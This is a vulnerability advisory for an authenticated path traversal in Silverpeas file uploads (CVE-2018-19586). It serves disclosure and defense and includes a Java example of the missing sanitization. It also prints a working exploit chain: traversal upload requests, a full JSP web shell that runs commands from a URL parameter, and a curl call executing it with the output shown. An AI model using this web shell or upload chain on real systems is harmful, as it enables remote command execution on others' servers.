Product Description

From the vendor’s website:

“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations, including those in the media, retail, and government sectors.

Vulnerabilities List

One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application.

Affected Versions

5.15 to 6.0.2

Solution

If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed:

Path Traversal

Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.

Vulnerability Details

CVE ID: CVE-2018-19586

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-23

CVSS Base Score: 9.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The path traversal vulnerability is located in an upload mechanism that is reachable from several other features (e.g., forum, ideas) with regular user privileges. The application takes the destination path of the upload from the X-FULL-PATH HTTP request header without proper sanitization:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENTS

The file is then created in /tmp:

root@vulns:/tmp# ls -lah | grep -i test
-rw-r--r-- 1 root root 201 nov. 16 02:53 test.png

By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. When the official Silverpeas installer is used, the core package (containing the main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application archive (WAR) that is reachable under /weblib/ and whose path is not randomized.
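The check the advisory says is missing, written here as an added Java example (not Silverpeas code and not the FileUploadData class itself): the client-supplied path is reduced to its file name component and the final location is verified to remain under the upload root. The upload root, the method names and the per-upload UUID directory layout are assumptions.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.UUID;

// Added example, not Silverpeas code. The upload root, the method names and the
// per-upload UUID directory layout are assumptions used to illustrate the check.
public final class SafeUploadPath {

    // Shape of the flaw described above: the client-controlled header value is joined
    // to the upload root as-is, so "../" segments walk out of it. Kept for comparison only.
    static Path unsafeResolve(Path uploadRoot, String clientPath) {
        return uploadRoot.resolve(clientPath).normalize();
    }

    // Hardened form: honour only the final name component, place it in a fresh
    // per-upload directory, and verify after normalisation that it is still under the root.
    static Path safeResolve(Path uploadRoot, String clientPath) throws IOException {
        Path root = uploadRoot.toAbsolutePath().normalize();
        Path name = Paths.get(clientPath).getFileName();
        String n = (name == null) ? "" : name.toString();
        // Reject empty names, dot segments and names carrying a foreign separator.
        if (n.isEmpty() || n.equals(".") || n.equals("..") || n.indexOf('\\') >= 0) {
            throw new IOException("invalid upload file name: " + clientPath);
        }
        Path target = root.resolve(UUID.randomUUID().toString()).resolve(n).normalize();
        if (!target.startsWith(root)) {
            throw new IOException("upload path escapes " + root + ": " + clientPath);
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path root = Paths.get("/opt/silverpeas/data/temp"); // assumed $SILVERPEAS_HOME/data/temp
        String header = "../../../../../../../tmp/test.png"; // X-FULL-PATH value from the advisory
        System.out.println("unsafe: " + unsafeResolve(root, header));
        System.out.println("safe:   " + safeResolve(root, header));
    }
}
```

Confining the write location is the control that matters here; a file-type allowlist is a separate measure and does not replace it.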

The request below can be used to deploy a malicious JSP file:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd, null, null);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) { output += s + "\n"; }
        } catch (IOException e) { e.printStackTrace(); }
    }
%>
<%=output %>

Command execution can then be achieved through the deployed file, as shown below:

$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'
appclient
bin
copyright.txt
docs
domain
jboss-modules.jar
LICENSE.txt
modules
README.txt
standalone
welcome-content

The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:

Disclosure Timeline:

11/10/2018: Initial discovery for version 6.0.2

11/26/2018: Initial notification of product vendor

12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected

12/14/2018: Patches released for 5.15 and 6.0

Researcher:

Bastien Faure, Security Associate at Bishop Fox